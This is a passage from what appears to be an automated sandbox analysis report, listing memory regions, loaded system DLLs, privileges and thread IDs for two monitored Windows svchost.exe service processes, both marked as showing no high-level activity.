| private_0x0000008fca900000 | 0x8fca900000 | 0x8fca9fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fcab00000 | 0x8fcab00000 | 0x8fcabfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fcac00000 | 0x8fcac00000 | 0x8fcacfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fcad00000 | 0x8fcad00000 | 0x8fcadfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fcae00000 | 0x8fcae00000 | 0x8fcafccfff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fcb000000 | 0x8fcb000000 | 0x8fcb0fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fcb100000 | 0x8fcb100000 | 0x8fcb1fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fcb400000 | 0x8fcb400000 | 0x8fcb4fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fcb500000 | 0x8fcb500000 | 0x8fcb5fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fcb600000 | 0x8fcb600000 | 0x8fcb6fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fcb700000 | 0x8fcb700000 | 0x8fcb7fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fcb800000 | 0x8fcb800000 | 0x8fcb8fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fcb900000 | 0x8fcb900000 | 0x8fcb9fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fcba00000 | 0x8fcba00000 | 0x8fcbafffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fcbd00000 | 0x8fcbd00000 | 0x8fcbdfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fcbe00000 | 0x8fcbe00000 | 0x8fcbefffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ffed0000 | 0x7df5ffed0000 | 0x7ff5ffecffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff6e0be6000 | 0x7ff6e0be6000 | 0x7ff6e0be7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0be8000 | 0x7ff6e0be8000 | 0x7ff6e0be9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0bea000 | 0x7ff6e0bea000 | 0x7ff6e0bebfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0bec000 | 0x7ff6e0bec000 | 0x7ff6e0bedfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0bee000 | 0x7ff6e0bee000 | 0x7ff6e0beffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0bf0000 | 0x7ff6e0bf0000 | 0x7ff6e0bf1fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0bf2000 | 0x7ff6e0bf2000 | 0x7ff6e0bf3fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0bf4000 | 0x7ff6e0bf4000 | 0x7ff6e0bf5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0bf8000 | 0x7ff6e0bf8000 | 0x7ff6e0bf9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0bfa000 | 0x7ff6e0bfa000 | 0x7ff6e0bfbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0bfe000 | 0x7ff6e0bfe000 | 0x7ff6e0bfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff6e0c00000 | 0x7ff6e0c00000 | 0x7ff6e0cfffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6e0d00000 | 0x7ff6e0d00000 | 0x7ff6e0d22fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff6e0d26000 | 0x7ff6e0d26000 | 0x7ff6e0d27fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0d28000 | 0x7ff6e0d28000 | 0x7ff6e0d28fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0d2a000 | 0x7ff6e0d2a000 | 0x7ff6e0d2bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0d2c000 | 0x7ff6e0d2c000 | 0x7ff6e0d2dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0d2e000 | 0x7ff6e0d2e000 | 0x7ff6e0d2ffff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff6e1100000 | 0x7ff6e110cfff | Memory Mapped File | rwx |
|
|
|
- |
| wer.dll | 0x7ffc3f100000 | 0x7ffc3f19dfff | Memory Mapped File | rwx |
|
|
|
- |
| ncbservice.dll | 0x7ffc467c0000 | 0x7ffc46817fff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x7ffc48ff0000 | 0x7ffc49459fff | Memory Mapped File | rwx |
|
|
|
- |
| systemeventsbrokerclient.dll | 0x7ffc4a470000 | 0x7ffc4a47afff | Memory Mapped File | rwx |
|
|
|
- |
| execmodelclient.dll | 0x7ffc4b030000 | 0x7ffc4b072fff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x7ffc4b090000 | 0x7ffc4b09dfff | Memory Mapped File | rwx |
|
|
|
- |
| trkwks.dll | 0x7ffc4b260000 | 0x7ffc4b281fff | Memory Mapped File | rwx |
|
|
|
- |
| sysmain.dll | 0x7ffc4b6f0000 | 0x7ffc4b802fff | Memory Mapped File | rwx |
|
|
|
- |
| pcasvc.dll | 0x7ffc4b810000 | 0x7ffc4b88ffff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x7ffc4c220000 | 0x7ffc4c25efff | Memory Mapped File | rwx |
|
|
|
- |
| pcacli.dll | 0x7ffc4d250000 | 0x7ffc4d25efff | Memory Mapped File | rwx |
|
|
|
- |
| pcadm.dll | 0x7ffc4d470000 | 0x7ffc4d47ffff | Memory Mapped File | rwx |
|
|
|
- |
| wdi.dll | 0x7ffc4dab0000 | 0x7ffc4daccfff | Memory Mapped File | rwx |
|
|
|
- |
| httpprxc.dll | 0x7ffc4f9d0000 | 0x7ffc4f9d8fff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7ffc4fb00000 | 0x7ffc4fb35fff | Memory Mapped File | rwx |
|
|
|
- |
| wudfplatform.dll | 0x7ffc506a0000 | 0x7ffc506d2fff | Memory Mapped File | rwx |
|
|
|
- |
| wudfsvc.dll | 0x7ffc506e0000 | 0x7ffc506fafff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ffc511b0000 | 0x7ffc51332fff | Memory Mapped File | rwx |
|
|
|
- |
| mmdevapi.dll | 0x7ffc51340000 | 0x7ffc513b1fff | Memory Mapped File | rwx |
|
|
|
- |
| audioendpointbuilder.dll | 0x7ffc513c0000 | 0x7ffc51409fff | Memory Mapped File | rwx |
|
|
|
- |
| bi.dll | 0x7ffc514f0000 | 0x7ffc514fbfff | Memory Mapped File | rwx |
|
|
|
- |
| taskschd.dll | 0x7ffc51760000 | 0x7ffc5181ffff | Memory Mapped File | rwx |
|
|
|
- |
| portabledeviceconnectapi.dll | 0x7ffc518f0000 | 0x7ffc51906fff | Memory Mapped File | rwx |
|
|
|
- |
| portabledeviceapi.dll | 0x7ffc51910000 | 0x7ffc519b0fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7ffc51c30000 | 0x7ffc51c3afff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7ffc51c50000 | 0x7ffc51c87fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7ffc52640000 | 0x7ffc52652fff | Memory Mapped File | rwx |
|
|
|
- |
| coremessaging.dll | 0x7ffc52730000 | 0x7ffc527f7fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7ffc52cd0000 | 0x7ffc52d47fff | Memory Mapped File | rwx |
|
|
|
- |
| brokerlib.dll | 0x7ffc52e40000 | 0x7ffc52e7efff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ffc52ef0000 | 0x7ffc52f16fff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x7ffc53720000 | 0x7ffc53777fff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x7ffc53810000 | 0x7ffc5382bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7ffc53920000 | 0x7ffc53951fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc53a90000 | 0x7ffc53ac2fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ffc53b80000 | 0x7ffc53b9efff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7ffc53dd0000 | 0x7ffc53e2cfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc54210000 | 0x7ffc54226fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc54280000 | 0x7ffc5428afff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffc54320000 | 0x7ffc5434bfff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffc54580000 | 0x7ffc54592fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffc545a0000 | 0x7ffc545e9fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ffc545f0000 | 0x7ffc54600fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ffc54620000 | 0x7ffc54663fff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x7ffc54ca0000 | 0x7ffc54cf3fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ffc54db0000 | 0x7ffc54f70fff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 30 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #55: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #55 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k LocalService |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x398 |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Local Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
850
0x
834
0x
830
0x
760
0x
6F4
0x
6EC
0x
6C8
0x
6C4
0x
6C0
0x
6BC
0x
690
0x
584
0x
544
0x
540
0x
514
0x
190
0x
1A0
0x
118
0x
3F4
0x
3F0
0x
3E4
0x
39C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x0000004052d70000 | 0x4052d70000 | 0x4052d7ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0x4052d80000 | 0x4052d80fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000004052d90000 | 0x4052d90000 | 0x4052da3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000004052db0000 | 0x4052db0000 | 0x4052e2ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000004052e30000 | 0x4052e30000 | 0x4052e33fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000004052e40000 | 0x4052e40000 | 0x4052e40fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000004052e50000 | 0x4052e50000 | 0x4052e51fff | Private Memory | rw |
|
|
|
- |
| private_0x0000004052e60000 | 0x4052e60000 | 0x4052e60fff | Private Memory | rw |
|
|
|
- |
| private_0x0000004052e70000 | 0x4052e70000 | 0x4052e70fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000004052e80000 | 0x4052e80000 | 0x4052e80fff | Pagefile Backed Memory | r |
|
|
|
- |
| stdole2.tlb | 0x4052e90000 | 0x4052e94fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000004052ea0000 | 0x4052ea0000 | 0x4052ea6fff | Private Memory | rw |
|
|
|
- |
| es.dll | 0x4052eb0000 | 0x4052ec1fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000004052ed0000 | 0x4052ed0000 | 0x4052ed1fff | Pagefile Backed Memory | r |
|
|
|
- |
| netprofmsvc.dll.mui | 0x4052ee0000 | 0x4052ee1fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000004052ef0000 | 0x4052ef0000 | 0x4052ef0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000004052f00000 | 0x4052f00000 | 0x4052ffffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x4053000000 | 0x40530bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000004053190000 | 0x4053190000 | 0x4053196fff | Private Memory | rw |
|
|
|
- |
| private_0x0000004053200000 | 0x4053200000 | 0x40532fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000004053300000 | 0x4053300000 | 0x4053487fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000004053490000 | 0x4053490000 | 0x4053610fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000004053620000 | 0x4053620000 | 0x40536dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000040536e0000 | 0x40536e0000 | 0x40537dffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x40537e0000 | 0x4053b16fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000004053b20000 | 0x4053b20000 | 0x4053c1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004053c20000 | 0x4053c20000 | 0x4053d1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004053d20000 | 0x4053d20000 | 0x4053e1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004053e20000 | 0x4053e20000 | 0x4053e9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004053ea0000 | 0x4053ea0000 | 0x4053f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004053fa0000 | 0x4053fa0000 | 0x405409ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000040540a0000 | 0x40540a0000 | 0x405419ffff | Private Memory | rw |
|
|
|
- |
| ~fontcache-fontface.dat | 0x40541a0000 | 0x405519ffff | Memory Mapped File | rw |
|
|
|
- |
| ~fontcache-system.dat | 0x40551a0000 | 0x4055215fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000004055220000 | 0x4055220000 | 0x405531ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004055320000 | 0x4055320000 | 0x405541ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004055420000 | 0x4055420000 | 0x405551ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004055700000 | 0x4055700000 | 0x40557fffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x4055e20000 | 0x4055efefff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000004055f00000 | 0x4055f00000 | 0x4055ffffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004056000000 | 0x4056000000 | 0x40560fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004056100000 | 0x4056100000 | 0x40561fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004056200000 | 0x4056200000 | 0x40562fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004056300000 | 0x4056300000 | 0x40563fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004056400000 | 0x4056400000 | 0x40564fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004056500000 | 0x4056500000 | 0x40565fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004056600000 | 0x4056600000 | 0x40566fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004056700000 | 0x4056700000 | 0x40567fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004056800000 | 0x4056800000 | 0x40568fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004056900000 | 0x4056900000 | 0x40569fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004056a00000 | 0x4056a00000 | 0x4056afffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004056b00000 | 0x4056b00000 | 0x4056bfffff | Private Memory | rw |
|
|
|
- |
| ~fontcache-s-1-5-21-1462094071-1423818996-289466292-1000.dat | 0x4056c00000 | 0x40573fffff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x00007df5ff270000 | 0x7df5ff270000 | 0x7ff5ff26ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff6e054c000 | 0x7ff6e054c000 | 0x7ff6e054dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e054e000 | 0x7ff6e054e000 | 0x7ff6e054ffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0550000 | 0x7ff6e0550000 | 0x7ff6e0551fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0552000 | 0x7ff6e0552000 | 0x7ff6e0553fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0554000 | 0x7ff6e0554000 | 0x7ff6e0555fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0556000 | 0x7ff6e0556000 | 0x7ff6e0557fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0558000 | 0x7ff6e0558000 | 0x7ff6e0559fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e055a000 | 0x7ff6e055a000 | 0x7ff6e055bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e055c000 | 0x7ff6e055c000 | 0x7ff6e055dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e055e000 | 0x7ff6e055e000 | 0x7ff6e055ffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0560000 | 0x7ff6e0560000 | 0x7ff6e0561fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0564000 | 0x7ff6e0564000 | 0x7ff6e0565fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0566000 | 0x7ff6e0566000 | 0x7ff6e0567fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0568000 | 0x7ff6e0568000 | 0x7ff6e0569fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e056a000 | 0x7ff6e056a000 | 0x7ff6e056bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e056c000 | 0x7ff6e056c000 | 0x7ff6e056dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e056e000 | 0x7ff6e056e000 | 0x7ff6e056ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff6e0570000 | 0x7ff6e0570000 | 0x7ff6e066ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6e0670000 | 0x7ff6e0670000 | 0x7ff6e0692fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff6e0693000 | 0x7ff6e0693000 | 0x7ff6e0694fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0695000 | 0x7ff6e0695000 | 0x7ff6e0696fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0697000 | 0x7ff6e0697000 | 0x7ff6e0698fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0699000 | 0x7ff6e0699000 | 0x7ff6e069afff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e069d000 | 0x7ff6e069d000 | 0x7ff6e069efff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e069f000 | 0x7ff6e069f000 | 0x7ff6e069ffff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff6e1100000 | 0x7ff6e110cfff | Memory Mapped File | rwx |
|
|
|
- |
| bluetoothapis.dll | 0x7ffc4aee0000 | 0x7ffc4aefdfff | Memory Mapped File | rwx |
|
|
|
- |
| bthtelemetry.dll | 0x7ffc4af00000 | 0x7ffc4af0cfff | Memory Mapped File | rwx |
|
|
|
- |
| bthradiomedia.dll | 0x7ffc4af10000 | 0x7ffc4af27fff | Memory Mapped File | rwx |
|
|
|
- |
| wlanradiomanager.dll | 0x7ffc4afc0000 | 0x7ffc4afd3fff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x7ffc4b090000 | 0x7ffc4b09dfff | Memory Mapped File | rwx |
|
|
|
- |
| wlanapi.dll | 0x7ffc4b170000 | 0x7ffc4b1cefff | Memory Mapped File | rwx |
|
|
|
- |
| netprofmsvc.dll | 0x7ffc4b1d0000 | 0x7ffc4b25cfff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x7ffc4c270000 | 0x7ffc4c279fff | Memory Mapped File | rwx |
|
|
|
- |
| perftrack.dll | 0x7ffc4c450000 | 0x7ffc4c467fff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x7ffc4d9d0000 | 0x7ffc4daa5fff | Memory Mapped File | rwx |
|
|
|
- |
| wdi.dll | 0x7ffc4dab0000 | 0x7ffc4daccfff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x7ffc50a50000 | 0x7ffc50a69fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc6.dll | 0x7ffc50a70000 | 0x7ffc50a85fff | Memory Mapped File | rwx |
|
|
|
- |
| nsisvc.dll | 0x7ffc50bf0000 | 0x7ffc50bfbfff | Memory Mapped File | rwx |
|
|
|
- |
| fontprovider.dll | 0x7ffc50fa0000 | 0x7ffc50fc8fff | Memory Mapped File | rwx |
|
|
|
- |
| fntcache.dll | 0x7ffc50fd0000 | 0x7ffc51173fff | Memory Mapped File | rwx |
|
|
|
- |
| es.dll | 0x7ffc516e0000 | 0x7ffc51759fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7ffc51c30000 | 0x7ffc51c3afff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7ffc51c50000 | 0x7ffc51c87fff | Memory Mapped File | rwx |
|
|
|
- |
| nlaapi.dll | 0x7ffc51cb0000 | 0x7ffc51cc7fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ffc52ef0000 | 0x7ffc52f16fff | Memory Mapped File | rwx |
|
|
|
- |
| gpapi.dll | 0x7ffc534a0000 | 0x7ffc534c2fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc53a90000 | 0x7ffc53ac2fff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x7ffc53be0000 | 0x7ffc53c87fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7ffc53dd0000 | 0x7ffc53e2cfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc54210000 | 0x7ffc54226fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc54280000 | 0x7ffc5428afff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| sxs.dll | 0x7ffc54440000 | 0x7ffc544d7fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffc54580000 | 0x7ffc54592fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffc545a0000 | 0x7ffc545e9fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ffc54620000 | 0x7ffc54663fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffc55910000 | 0x7ffc559cdfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7ffc56f00000 | 0x7ffc56f07fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ffc57750000 | 0x7ffc57890fff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7ffc57900000 | 0x7ffc57968fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffc57970000 | 0x7ffc57a14fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffc57aa0000 | 0x7ffc57b45fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #56: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #56 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k NetworkService |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x250 |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Network Service |
| Enabled Privileges | SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
798
0x
88C
0x
EE4
0x
988
0x
96C
0x
908
0x
824
0x
814
0x
428
0x
6B8
0x
6AC
0x
6A8
0x
5C4
0x
528
0x
47C
0x
478
0x
468
0x
458
0x
438
0x
430
0x
42C
0x
380
0x
144
0x
25C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000f60f9c0000 | 0xf60f9c0000 | 0xf60f9cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0xf60f9d0000 | 0xf60f9d0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000f60f9e0000 | 0xf60f9e0000 | 0xf60f9f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f60fa00000 | 0xf60fa00000 | 0xf60fa7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f60fa80000 | 0xf60fa80000 | 0xf60fa83fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000f60fa90000 | 0xf60fa90000 | 0xf60fa90fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f60faa0000 | 0xf60faa0000 | 0xf60faa1fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f60fab0000 | 0xf60fab0000 | 0xf60fab0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f60fac0000 | 0xf60fac0000 | 0xf60fac6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f60fad0000 | 0xf60fad0000 | 0xf60fad0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f60fae0000 | 0xf60fae0000 | 0xf60fae6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f60faf0000 | 0xf60faf0000 | 0xf60faf0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f60fb00000 | 0xf60fb00000 | 0xf60fbfffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xf60fc00000 | 0xf60fcbdfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000f60fd40000 | 0xf60fd40000 | 0xf60fdfffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f60fe00000 | 0xf60fe00000 | 0xf60fefffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f60ff00000 | 0xf60ff00000 | 0xf610087fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000f610090000 | 0xf610090000 | 0xf610210fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f610320000 | 0xf610320000 | 0xf61041ffff | Private Memory | rw |
|
|
|
- |
